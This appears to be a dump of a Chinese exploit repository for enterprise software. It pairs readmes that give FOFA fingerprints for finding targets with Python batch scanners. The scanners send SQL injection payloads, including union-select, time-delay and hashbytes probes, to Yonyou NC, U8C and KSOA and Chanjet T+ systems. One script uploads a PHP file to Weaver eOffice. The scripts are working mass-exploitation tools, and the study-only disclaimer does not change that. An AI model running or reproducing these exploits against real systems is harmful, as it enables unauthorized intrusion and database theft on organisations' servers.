免责声明:请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失,均由使用者本人负责,所产生的一切不良后果与作者无关。该文章仅供学习用途使用!!! 4 | 5 | fofa: body="JS/ligerComboBox/ligerTree.js" 6 | 7 | 批量poc(记得安装库) 8 | 9 | pip install argparse requests rich 10 | 11 | 12 | 13 | 14 | 15 | python poc.py -u 16 | 17 | python poc.py -f .txt 18 | 19 | 结果保存至result.txt 20 | 21 | 22 | 23 | ![image-20240307092017883](assets/image-20240307092017883.png) 24 | 25 | 26 | 27 | -------------------------------------------------------------------------------- /20240321用友NC runScript接口存在SQL注入-附py/assets/image-20240307092017883.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/y1hub/poc_exp/2398dd76ffeb286912187a4cbcce23b868002ac7/20240321用友NC runScript接口存在SQL注入-附py/assets/image-20240307092017883.png -------------------------------------------------------------------------------- /20240321用友NC runScript接口存在SQL注入-附py/readme.md: -------------------------------------------------------------------------------- 1 | # 用友NC runScript接口存在SQL注入漏洞 2 | 3 | 免责声明:请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失,均由使用者本人负责,所产生的一切不良后果与作者无关。该文章仅供学习用途使用!!! 
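body="UClient.dmg"||app="用友-U8-Cloud"

批量poc(记得安装库)

pip install argparse requests rich

python poc.py -u

python poc.py -f .txt

结果保存至result.txt

![image-20240307092017883](assets/image-20240307092017883.png)

--------------------------------------------------------------------------------
/20240327某友时空KSOA imagefield接口SQL注入漏洞/assets/image-20240307092017883.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/y1hub/poc_exp/2398dd76ffeb286912187a4cbcce23b868002ac7/20240327某友时空KSOA imagefield接口SQL注入漏洞/assets/image-20240307092017883.png
--------------------------------------------------------------------------------
/20240327某友时空KSOA imagefield接口SQL注入漏洞/poc.py:
--------------------------------------------------------------------------------
# -*- coding: utf-8 -*-
import argparse
import base64
import re
import sys
import json
from multiprocessing.dummy import Pool
import requests
import urllib3
import hashlib
from rich.console import Console

urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)


def banner():
    """Print the tool banner: ASCII art, the PoC tag and the author line."""
    test = """
8b d8 88 88 a8P 88 888b 88 ,ad8888ba,
Y8, ,8P ,d88 88 ,88' ,d88 8888b 88 d8"' `"8b
Y8, ,8P 888888 88 ,88" 888888 88 `8b 88 d8'
"8aa8" 88 88,d88' 88 88 `8b 88 88
`88' 88 8888"88, 88 88 `8b 88 88 88888
88 88 88P Y8b 88 88 `8b 88 Y8, 88
88 88 88 "88, 88 88 `888 `"Y88888P"

888888888888

tag: this is a 用友时空KSOA imagefield接口SQL注入漏洞 poc
@version: 1.0.0 @author: Y1_K1NG
"""
    print(test)


def poc(target):
    """Probe one target for the union-based SQL injection in /servlet/imagefield.

    The injected ``sKeyvalue`` makes the database compute MD5("1") with the
    SQL Server functions ``hashbytes``/``sys.fn_varbintohexstr``; a hit is an
    HTTP 200 whose body contains that digest
    (``c4ca4238a0b923820dcc509a6f75849b``).  Hits are printed and appended to
    ``result.txt``; errors are caught and printed so a batch run keeps going.
    """
    target = target.rstrip("/")  # tolerate a trailing slash (and an empty string)
    path = "/servlet/imagefield?key=readimage&sImgname=password&sTablename=bbs_admin&sKeyname=id&sKeyvalue=-1%27+union+select+sys.fn_varbintohexstr(hashbytes(%27md5%27,%271%27))--+"
    url = target + path
    headers = {
        "User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.132 Safari/537.36",
    }
    marker = "c4ca4238a0b923820dcc509a6f75849b"  # == hashlib.md5(b"1").hexdigest()

    try:
        response1 = requests.get(url=url, headers=headers, verify=False, timeout=15)

        if response1.status_code == 200 and marker in response1.text:
            print(f"[++++++] {target} 存在sql")
            with open("result.txt", "a+", encoding="utf-8") as f:
                f.write(target + "\n")
        else:
            print(f"[-] {target} 未发现")

    except Exception as e:
        print(f"[*] {target} error: {str(e)}")


def extract_host(url):
    """
    Pull (host, port) out of a loosely formatted target string.

    Accepts ``host``, ``host:port``, ``http://host[:port]`` and
    ``https://host[:port]``; anything after the host/port (a path, a query)
    is ignored.  The port defaults to 443 when an ``https://`` prefix is
    present and to 80 otherwise.  Returns ``(None, None)`` when no host can be
    found (e.g. an empty string).

    The host character class includes ``-`` because a word-character class
    does not: with the old pattern ``my-host.example.com`` was truncated to
    ``my``.  IPv6 literals are still not supported.
    """
    match = re.search(r"(https?://)?([\w.-]+)(?::(\d+))?", url)
    if not match:
        return None, None
    prefix, host, port = match.groups()
    if not port:
        port = "443" if prefix and "https" in prefix else "80"
    return host, int(port)


def _normalize_target(raw):
    """Return ``raw`` unchanged when it already carries a scheme, otherwise
    ``http://host:port`` built from ``extract_host``; ``None`` when no host
    could be extracted (empty or unparsable input)."""
    if "https://" in raw or "http://" in raw:
        return raw
    host, port = extract_host(raw)
    if host is None:
        return None
    return f"http://{host}:{port}"


def main():
    """CLI entry point: scan one target (-u) or every target listed in a file (-f).

    Scheme-less targets are normalised to ``http://host:port``; a target that
    cannot be parsed is reported and skipped rather than scanned as the bogus
    URL ``http://None:None`` (the original behaviour), and blank lines in the
    ``-f`` file are ignored.  Batch mode runs ``poc`` on ten worker threads;
    each appends its own line to ``result.txt`` through a separate file
    handle, so interleaved lines are unlikely but not guaranteed.
    """
    banner()
    parser = argparse.ArgumentParser(description='任何问题+V y1k1ng1227')
    parser.add_argument("-u", "--url", dest="url", type=str, help=" example: http://www.example.com")
    parser.add_argument("-f", "--file", dest="file", type=str, help=" urls.txt")
    args = parser.parse_args()

    if args.url and not args.file:
        url = _normalize_target(args.url)
        if url is None:
            print(f"[*] {args.url} error: cannot parse host")
            return
        poc(url)

    elif args.url is None and args.file is not None:
        url_list = []
        with open(args.file, "r", encoding="utf-8") as f:
            for line in f:
                raw = line.strip()
                if not raw:
                    continue  # blank line in the target list
                url = _normalize_target(raw)
                if url is None:
                    print(f"[*] {raw} error: cannot parse host")
                    continue
                url_list.append(url)

        pool = Pool(10)
        pool.map(poc, url_list)
        pool.close()
        pool.join()

    else:
        parser.print_help()


if __name__ == '__main__':
    main()
--------------------------------------------------------------------------------
/20240327某友时空KSOA imagefield接口SQL注入漏洞/readme.md:
--------------------------------------------------------------------------------
# 用友时空KSOA imagefield接口SQL注入漏洞

免责声明:请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失,均由使用者本人负责,所产生的一切不良后果与作者无关。该文章仅供学习用途使用!!!

body="UClient.dmg"||app="用友-U8-Cloud"

(注: 本 readme 的标题与指纹行原为 20240321「用友NC runScript接口存在SQL注入漏洞」条目的复制残留; 标题已按目录名和 poc.py 中的 tag 更正, 指纹行与 runScript 条目完全相同, 使用前请核实其是否适用于用友时空KSOA。)

批量poc(记得安装库)

pip install argparse requests rich

python poc.py -u

python poc.py -f .txt

结果保存至result.txt

![image-20240307092017883](assets/image-20240307092017883.png)

--------------------------------------------------------------------------------
/20240328某凌EIS智慧协同平台doc_fileedit_word.aspxSQL注入/assets/image-20240307092017883.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/y1hub/poc_exp/2398dd76ffeb286912187a4cbcce23b868002ac7/20240328某凌EIS智慧协同平台doc_fileedit_word.aspxSQL注入/assets/image-20240307092017883.png
--------------------------------------------------------------------------------
/20240328某凌EIS智慧协同平台doc_fileedit_word.aspxSQL注入/readme.md:
--------------------------------------------------------------------------------
# 某凌EIS智慧协同平台doc_fileedit_word.aspxSQL注入

免责声明:请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失,均由使用者本人负责,所产生的一切不良后果与作者无关。该文章仅供学习用途使用!!!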
4 | 5 | app="Landray-EIS智慧协同平台" 6 | 7 | 批量poc(记得安装库) 8 | 9 | pip install argparse requests rich 10 | 11 | 12 | 13 | 14 | 15 | python poc.py -u 16 | 17 | python poc.py -f .txt 18 | 19 | 结果保存至result.txt 20 | 21 | 22 | 23 | ![image-20240307092017883](assets/image-20240307092017883.png) 24 | 25 | 26 | 27 | -------------------------------------------------------------------------------- /20240331用友U8-nc.bs.sm.login2.RegisterServlet SQL注入/assets/image-20240307092017883.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/y1hub/poc_exp/2398dd76ffeb286912187a4cbcce23b868002ac7/20240331用友U8-nc.bs.sm.login2.RegisterServlet SQL注入/assets/image-20240307092017883.png -------------------------------------------------------------------------------- /20240331用友U8-nc.bs.sm.login2.RegisterServlet SQL注入/poc.py: -------------------------------------------------------------------------------- 1 | # -*- coding: utf-8 -*- 2 | import argparse 3 | import base64 4 | import re 5 | import sys 6 | import json 7 | from multiprocessing.dummy import Pool 8 | import requests 9 | import urllib3 10 | import hashlib 11 | from rich.console import Console 12 | 13 | urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) 14 | 15 | 16 | def banner(): 17 | test = """ 18 | 8b d8 88 88 a8P 88 888b 88 ,ad8888ba, 19 | Y8, ,8P ,d88 88 ,88' ,d88 8888b 88 d8"' `"8b 20 | Y8, ,8P 888888 88 ,88" 888888 88 `8b 88 d8' 21 | "8aa8" 88 88,d88' 88 88 `8b 88 88 22 | `88' 88 8888"88, 88 88 `8b 88 88 88888 23 | 88 88 88P Y8b 88 88 `8b 88 Y8, 88 24 | 88 88 88 "88, 88 88 `888 `"Y88888P" 25 | 26 | 888888888888 27 | 28 | tag: this is a 用友U8-nc.bs.sm.login2.RegisterServlet SQL注入 poc 29 | @version: 1.0.0 @author: Y1_K1NG 30 | """ 31 | print(test) 32 | 33 | 34 | def poc(target): 35 | if target[-1] == '/': 36 | target = target[:-1] 37 | else: 38 | target = target 39 | path = 
"/servlet/~uap/nc.bs.sm.login2.RegisterServlet?usercode=1%27%20UNION%20ALL%20SELECT%20NULL,NULL,NULL,NULL,NULL,NULL,NULL,@@version,NULL,NULL,NULL,NULL--%20Jptd" 40 | url = target + path 41 | headers = { 42 | 'X-Forwarded-For': '127.0.0.1', 43 | 'Cookie': 'JSESSIONID=D523370AE42E1D2363160250C914E62A.server' 44 | } 45 | 46 | try: 47 | # conn = http.client.HTTPConnection(target) 48 | # conn.request("POST", path, body.encode("utf-8"), headers) 49 | # response1 = conn.getresponse() 50 | response1 = requests.get(url=url, headers=headers, verify=False, timeout=15) 51 | 52 | 53 | if response1.status_code == 200 : 54 | print(f"[++++++] {target} 存在sql") 55 | with open("result.txt", "a+", encoding="utf-8") as f: 56 | f.write(target + "\n") 57 | else: 58 | print(f"[-] {target} 未发现") 59 | 60 | except Exception as e: 61 | print(f"[*] {target} error: {str(e)}") 62 | 63 | 64 | def extract_host(url): 65 | """ 66 | 从 URL 中提取主机地址和端口号,返回 (host, port) 67 | """ 68 | match = re.search(r"(http://|https://)?([\w\.]+):?(\d+)?", url) 69 | if match: 70 | prefix, host, port = match.groups() 71 | if not port: 72 | if prefix and "https" in prefix: 73 | port = "443" 74 | else: 75 | port = "80" 76 | return host, int(port) 77 | else: 78 | return None, None 79 | 80 | 81 | def main(): 82 | banner() 83 | parser = argparse.ArgumentParser(description='任何问题+V y1k1ng1227') 84 | parser.add_argument("-u", "--url", dest="url", type=str, help=" example: http://www.example.com") 85 | parser.add_argument("-f", "--file", dest="file", type=str, help=" urls.txt") 86 | args = parser.parse_args() 87 | 88 | if args.url and not args.file: 89 | if "https://" in args.url or "http://" in args.url: 90 | url = args.url 91 | else: 92 | host, port = extract_host(args.url) 93 | url = f"http://{host}:{port}" 94 | poc(url) 95 | 96 | elif args.url is None and args.file is not None: 97 | url_list = [] 98 | with open(args.file, "r", encoding="utf-8") as f: 99 | for url in f.readlines(): 100 | url = url.strip().replace("\n", "") 
101 | if "https://" in url or "http://" in url: 102 | url = url 103 | else: 104 | host, port = extract_host(url) 105 | url = f"http://{host}:{port}" 106 | url_list.append(url) 107 | 108 | pool = Pool(10) 109 | pool.map(poc, url_list) 110 | pool.close() 111 | pool.join() 112 | 113 | else: 114 | parser.print_help() 115 | 116 | 117 | if __name__ == '__main__': 118 | main() 119 | -------------------------------------------------------------------------------- /20240331用友U8-nc.bs.sm.login2.RegisterServlet SQL注入/readme.md: -------------------------------------------------------------------------------- 1 | # 用友U8-nc.bs.sm.login2.RegisterServlet SQL注入 2 | 3 | 免责声明:请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失,均由使用者本人负责,所产生的一切不良后果与作者无关。该文章仅供学习用途使用!!! 4 | 5 | app="用友-U8-Cloud" 6 | 7 | 批量poc(记得安装库) 8 | 9 | pip install argparse requests rich 10 | 11 | 12 | 13 | 14 | 15 | python poc.py -u 16 | 17 | python poc.py -f .txt 18 | 19 | 结果保存至result.txt 20 | 21 | 22 | 23 | ![image-20240307092017883](assets/image-20240307092017883.png) 24 | 25 | 26 | 27 | -------------------------------------------------------------------------------- /20240405maxView系统dynamiccontent.properties.xhtml远程代码执行漏洞/assets/image-20240307092017883.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/y1hub/poc_exp/2398dd76ffeb286912187a4cbcce23b868002ac7/20240405maxView系统dynamiccontent.properties.xhtml远程代码执行漏洞/assets/image-20240307092017883.png -------------------------------------------------------------------------------- /20240405maxView系统dynamiccontent.properties.xhtml远程代码执行漏洞/readme.md: -------------------------------------------------------------------------------- 1 | # maxView系统dynamiccontent.properties.xhtml远程代码执行漏洞 2 | 3 | 免责声明:请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失,均由使用者本人负责,所产生的一切不良后果与作者无关。该文章仅供学习用途使用!!! 
4 | 5 | "/manager/com/pmc/maxview/footer/TermsOfUse.xhtml" 6 | 7 | 批量poc(记得安装库) 8 | 9 | pip install argparse requests rich 10 | 11 | 12 | 13 | 14 | 15 | python poc.py -u 16 | 17 | python poc.py -f .txt 18 | 19 | 结果保存至result.txt 20 | 21 | 22 | 23 | ![image-20240307092017883](assets/image-20240307092017883.png) 24 | 25 | 26 | 27 | -------------------------------------------------------------------------------- /20240406万户ezOFFICE-wf_printnum.jspSQL注入漏洞/assets/image-20240307092017883.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/y1hub/poc_exp/2398dd76ffeb286912187a4cbcce23b868002ac7/20240406万户ezOFFICE-wf_printnum.jspSQL注入漏洞/assets/image-20240307092017883.png -------------------------------------------------------------------------------- /20240406万户ezOFFICE-wf_printnum.jspSQL注入漏洞/readme.md: -------------------------------------------------------------------------------- 1 | # 万户ezOFFICE-wf_printnum.jsp存在SQL注入漏洞 2 | 3 | 免责声明:请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失,均由使用者本人负责,所产生的一切不良后果与作者无关。该文章仅供学习用途使用!!! 
4 | 5 | "Ezoffice" 6 | 7 | 批量poc(记得安装库) 8 | 9 | pip install argparse requests rich 10 | 11 | 12 | 13 | 14 | 15 | python poc.py -u 16 | 17 | python poc.py -f .txt 18 | 19 | 结果保存至result.txt 20 | 21 | 22 | 23 | ![image-20240307092017883](assets/image-20240307092017883.png) 24 | 25 | 26 | 27 | -------------------------------------------------------------------------------- /20240407畅捷通T+ KeyInfoList.aspx SQL漏洞/assets/Snipaste_2024-04-07_21-14-08.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/y1hub/poc_exp/2398dd76ffeb286912187a4cbcce23b868002ac7/20240407畅捷通T+ KeyInfoList.aspx SQL漏洞/assets/Snipaste_2024-04-07_21-14-08.png -------------------------------------------------------------------------------- /20240407畅捷通T+ KeyInfoList.aspx SQL漏洞/poc.py: -------------------------------------------------------------------------------- 1 | # -*- coding: utf-8 -*- 2 | import argparse 3 | import base64 4 | import re 5 | import sys 6 | import json 7 | from multiprocessing.dummy import Pool 8 | import requests 9 | import urllib3 10 | import hashlib 11 | from rich.console import Console 12 | 13 | urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) 14 | 15 | 16 | def banner(): 17 | test = """ 18 | 8b d8 88 88 a8P 88 888b 88 ,ad8888ba, 19 | Y8, ,8P ,d88 88 ,88' ,d88 8888b 88 d8"' `"8b 20 | Y8, ,8P 888888 88 ,88" 888888 88 `8b 88 d8' 21 | "8aa8" 88 88,d88' 88 88 `8b 88 88 22 | `88' 88 8888"88, 88 88 `8b 88 88 88888 23 | 88 88 88P Y8b 88 88 `8b 88 Y8, 88 24 | 88 88 88 "88, 88 88 `888 `"Y88888P" 25 | 26 | 888888888888 27 | 28 | tag: this is a 畅捷通T+ KeyInfoList.aspx SQL漏洞 poc 29 | @version: 1.0.0 @author: Y1_K1NG 30 | """ 31 | print(test) 32 | 33 | 34 | def poc(target): 35 | if target[-1] == '/': 36 | target = target[:-1] 37 | else: 38 | target = target 39 | path = "/tplus/UFAQD/KeyInfoList.aspx?preload=1&zt=')AND+1+IN+(SELECT+sys.fn_varbintohexstr(hashbytes('MD5','123456')))--+" 40 | url = target + 
path 41 | headers = { 42 | 'User-Agent': 'Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36', 43 | 'Accept-Charset': 'utf-8', 44 | 'Accept-Encoding': 'gzip, deflate', 45 | 'Connection': 'close' 46 | } 47 | 48 | 49 | try: 50 | # conn = http.client.HTTPConnection(target) 51 | # conn.request("POST", path, body.encode("utf-8"), headers) 52 | # response1 = conn.getresponse() 53 | response1 = requests.get(url=url, headers=headers, verify=False, timeout=15) 54 | 55 | if response1.status_code == 200 and "e10adc3949ba59abbe56e057f20f883e" in response1.text: 56 | print(f"[++++++] {target} 存在sql") 57 | # print("响应体内容:", response1.text) 58 | with open("result.txt", "a+", encoding="utf-8") as f: 59 | f.write(target + "\n") 60 | else: 61 | print(f"[-] {target} 未发现") 62 | 63 | except Exception as e: 64 | print(f"[*] {target} error: {str(e)}") 65 | 66 | 67 | def extract_host(url): 68 | """ 69 | 从 URL 中提取主机地址和端口号,返回 (host, port) 70 | """ 71 | match = re.search(r"(http://|https://)?([\w\.]+):?(\d+)?", url) 72 | if match: 73 | prefix, host, port = match.groups() 74 | if not port: 75 | if prefix and "https" in prefix: 76 | port = "443" 77 | else: 78 | port = "80" 79 | return host, int(port) 80 | else: 81 | return None, None 82 | 83 | 84 | def main(): 85 | banner() 86 | parser = argparse.ArgumentParser(description='任何问题+V y1k1ng1227') 87 | parser.add_argument("-u", "--url", dest="url", type=str, help=" example: http://www.example.com") 88 | parser.add_argument("-f", "--file", dest="file", type=str, help=" urls.txt") 89 | args = parser.parse_args() 90 | 91 | if args.url and not args.file: 92 | if "https://" in args.url or "http://" in args.url: 93 | url = args.url 94 | else: 95 | host, port = extract_host(args.url) 96 | url = f"http://{host}:{port}" 97 | poc(url) 98 | 99 | elif args.url is None and args.file is not None: 100 | url_list = [] 101 | with open(args.file, "r", encoding="utf-8") as f: 102 
| for url in f.readlines(): 103 | url = url.strip().replace("\n", "") 104 | if "https://" in url or "http://" in url: 105 | url = url 106 | else: 107 | host, port = extract_host(url) 108 | url = f"http://{host}:{port}" 109 | url_list.append(url) 110 | 111 | pool = Pool(10) 112 | pool.map(poc, url_list) 113 | pool.close() 114 | pool.join() 115 | 116 | else: 117 | parser.print_help() 118 | 119 | 120 | if __name__ == '__main__': 121 | main() 122 | -------------------------------------------------------------------------------- /20240407畅捷通T+ KeyInfoList.aspx SQL漏洞/readme.md: -------------------------------------------------------------------------------- 1 | # 畅捷通T+ KeyInfoList.aspx SQL漏洞 2 | 3 | 免责声明:请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失,均由使用者本人负责,所产生的一切不良后果与作者无关。该文章仅供学习用途使用!!! 4 | 5 | app="畅捷通-TPlus" 6 | 7 | 批量poc(记得安装库) 8 | 9 | pip install argparse requests rich 10 | 11 | 12 | 13 | 14 | 15 | python poc.py -u 16 | 17 | python poc.py -f .txt 18 | 19 | 结果保存至result.txt 20 | 21 | ![Snipaste_2024-04-07_21-14-08](assets/Snipaste_2024-04-07_21-14-08.png) 22 | -------------------------------------------------------------------------------- /20240409用友NC Cloud importhttpscer任意文件上传/assets/Snipaste_2024-04-07_21-14-08.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/y1hub/poc_exp/2398dd76ffeb286912187a4cbcce23b868002ac7/20240409用友NC Cloud importhttpscer任意文件上传/assets/Snipaste_2024-04-07_21-14-08.png -------------------------------------------------------------------------------- /20240409用友NC Cloud importhttpscer任意文件上传/readme.md: -------------------------------------------------------------------------------- 1 | # 用友NC Cloud importhttpscer任意文件上传- 2 | 3 | 免责声明:请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失,均由使用者本人负责,所产生的一切不良后果与作者无关。该文章仅供学习用途使用!!! 
4 | 5 | app="用友-NC-Cloud" 6 | 7 | 批量poc(记得安装库) 8 | 9 | pip install argparse requests rich 10 | 11 | 12 | 13 | 14 | 15 | python poc.py -u 16 | 17 | python poc.py -f .txt 18 | 19 | 结果保存至result.txt 20 | 21 | ![Snipaste_2024-04-07_21-14-08](assets/Snipaste_2024-04-07_21-14-08.png) 22 | -------------------------------------------------------------------------------- /20240412weaver-eoffice-webservice文件上传/assets/Snipaste_2024-04-07_21-14-08.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/y1hub/poc_exp/2398dd76ffeb286912187a4cbcce23b868002ac7/20240412weaver-eoffice-webservice文件上传/assets/Snipaste_2024-04-07_21-14-08.png -------------------------------------------------------------------------------- /20240412weaver-eoffice-webservice文件上传/poc.py: -------------------------------------------------------------------------------- 1 | import requests,re,urllib3 2 | from hashlib import md5 3 | import base64 4 | urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) 5 | def randomInt(s,e): 6 | import random 7 | key=random.randint(int(s),int(e)) 8 | return key 9 | def randomLowercase(n): 10 | key="" 11 | zf="qwertyuiopasdfghjklzxcvbnm" 12 | import random 13 | for _ in range(n): 14 | suiji1=random.randint(0,len(zf)-1) 15 | key+=zf[suiji1] 16 | return key 17 | r1=randomLowercase(6) 18 | rand=randomInt(1000,9999) 19 | def scan(baseurl): 20 | url=baseurl+"webservice/upload/upload.php" 21 | headers = { 22 | 'User-Agent':'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0', 23 | 'Accept-Encoding': 'gzip, deflate, br', 24 | 'Content-Type': 'multipart/form-data; boundary=--------------------------553898708333958420021355' 25 | } 26 | data = f'''----------------------------553898708333958420021355\r 27 | Content-Disposition: form-data; name="file"; filename="{r1}.php4"\r 28 | Content-Type: application/octet-stream\r 29 | \r 30 | {rand}{r1}\r 31 | 
----------------------------553898708333958420021355--''' 32 | response = requests.post(url=url,headers=headers,data=data,verify=False,timeout=15) 33 | filepath=response.text.strip().replace('*','/') 34 | url=baseurl+f'attachment/{filepath}' 35 | headers = { 36 | 'User-Agent':'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0', 37 | } 38 | response = requests.get(url=url,headers=headers,verify=False,timeout=15) 39 | if str(rand)+r1 in response.text: 40 | return True 41 | else: 42 | return False 43 | -------------------------------------------------------------------------------- /20240412weaver-eoffice-webservice文件上传/readme.md: -------------------------------------------------------------------------------- 1 | # weaver-eoffice-webservice文件上传 2 | 3 | 免责声明:请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失,均由使用者本人负责,所产生的一切不良后果与作者无关。该文章仅供学习用途使用!!! 4 | 5 | app="泛微-EOffice" 6 | 7 | 批量poc(记得安装库) 8 | 9 | pip install argparse requests rich 10 | 11 | 注意: 本条目的 poc.py 只提供 scan(baseurl) 函数(baseurl 需以 / 结尾), 没有命令行入口, 下面的 -u/-f 用法和 result.txt 输出不适用于本脚本, 需自行调用 scan() 或补充入口; 该脚本会向目标上传一个随机命名的 .php4 测试文件并通过 attachment/ 路径读取验证, 但不会删除该文件, 测试后请自行清理。 12 | 13 | 14 | 15 | python poc.py -u 16 | 17 | python poc.py -f .txt 18 | 19 | 结果保存至result.txt 20 | 21 | ![Snipaste_2024-04-07_21-14-08](assets/Snipaste_2024-04-07_21-14-08.png) 22 | -------------------------------------------------------------------------------- /20240414用友-U8C-SQL注入-FormulaViewAction/assets/Snipaste_2024-04-07_21-14-08.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/y1hub/poc_exp/2398dd76ffeb286912187a4cbcce23b868002ac7/20240414用友-U8C-SQL注入-FormulaViewAction/assets/Snipaste_2024-04-07_21-14-08.png -------------------------------------------------------------------------------- /20240414用友-U8C-SQL注入-FormulaViewAction/poc.py: -------------------------------------------------------------------------------- 1 | # -*- coding: utf-8 -*- 2 | import argparse 3 | import base64 4 | import re 5 | import sys 6 | import json 7 | from multiprocessing.dummy import Pool 8 | import requests 9 | import urllib3 10 | 
import hashlib 11 | from rich.console import Console 12 | 13 | urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) 14 | 15 | 16 | def banner(): 17 | test = """ 18 | 8b d8 88 88 a8P 88 888b 88 ,ad8888ba, 19 | Y8, ,8P ,d88 88 ,88' ,d88 8888b 88 d8"' `"8b 20 | Y8, ,8P 888888 88 ,88" 888888 88 `8b 88 d8' 21 | "8aa8" 88 88,d88' 88 88 `8b 88 88 22 | `88' 88 8888"88, 88 88 `8b 88 88 88888 23 | 88 88 88P Y8b 88 88 `8b 88 Y8, 88 24 | 88 88 88 "88, 88 88 `888 `"Y88888P" 25 | 26 | 888888888888 27 | 28 | tag: this is a 用友-U8C-SQL注入-FormulaViewAction poc 29 | @version: 1.0.0 @author: Y1_K1NG 30 | """ 31 | print(test) 32 | 33 | 34 | def poc(target): 35 | if target[-1] == '/': 36 | target = target[:-1] 37 | else: 38 | target = target 39 | path = "/service/~iufo/com.ufida.web.action.ActionServlet?action=nc.ui.iuforeport.rep.FormulaViewAction&method=execute&repID=1')%20WAITFOR%20DELAY%20'0:0:5'--+&unitID=public" 40 | url = target + path 41 | headers = { 42 | "User-Agent": "Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0 info" 43 | } 44 | 45 | 46 | try: 47 | # conn = http.client.HTTPConnection(target) 48 | # conn.request("POST", path, body.encode("utf-8"), headers) 49 | # response1 = conn.getresponse() 50 | response1 = requests.get(url=url, headers=headers, verify=False, timeout=15) 51 | 52 | if response1.status_code == 200 and response1.elapsed.total_seconds() > 4: 53 | print(f"[++++++] {target} 存在sql") 54 | # print("响应体内容:", response1.text) 55 | with open("result.txt", "a+", encoding="utf-8") as f: 56 | f.write(target + "\n") 57 | else: 58 | print(f"[-] {target} 未发现") 59 | 60 | except Exception as e: 61 | print(f"[*] {target} error: {str(e)}") 62 | 63 | 64 | def extract_host(url): 65 | """ 66 | 从 URL 中提取主机地址和端口号,返回 (host, port) 67 | """ 68 | match = re.search(r"(http://|https://)?([\w\.]+):?(\d+)?", url) 69 | if match: 70 | prefix, host, port = match.groups() 71 | if not port: 72 | if prefix and "https" in prefix: 73 | port = "443" 74 | else: 75 | 
port = "80" 76 | return host, int(port) 77 | else: 78 | return None, None 79 | 80 | 81 | def main(): 82 | banner() 83 | parser = argparse.ArgumentParser(description='任何问题+V y1k1ng1227') 84 | parser.add_argument("-u", "--url", dest="url", type=str, help=" example: http://www.example.com") 85 | parser.add_argument("-f", "--file", dest="file", type=str, help=" urls.txt") 86 | args = parser.parse_args() 87 | 88 | if args.url and not args.file: 89 | if "https://" in args.url or "http://" in args.url: 90 | url = args.url 91 | else: 92 | host, port = extract_host(args.url) 93 | url = f"http://{host}:{port}" 94 | poc(url) 95 | 96 | elif args.url is None and args.file is not None: 97 | url_list = [] 98 | with open(args.file, "r", encoding="utf-8") as f: 99 | for url in f.readlines(): 100 | url = url.strip().replace("\n", "") 101 | if "https://" in url or "http://" in url: 102 | url = url 103 | else: 104 | host, port = extract_host(url) 105 | url = f"http://{host}:{port}" 106 | url_list.append(url) 107 | 108 | pool = Pool(10) 109 | pool.map(poc, url_list) 110 | pool.close() 111 | pool.join() 112 | 113 | else: 114 | parser.print_help() 115 | 116 | 117 | if __name__ == '__main__': 118 | main() 119 | -------------------------------------------------------------------------------- /20240414用友-U8C-SQL注入-FormulaViewAction/readme.md: -------------------------------------------------------------------------------- 1 | # 用友-U8C-SQL注入-FormulaViewAction 2 | 3 | 免责声明:请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失,均由使用者本人负责,所产生的一切不良后果与作者无关。该文章仅供学习用途使用!!! 
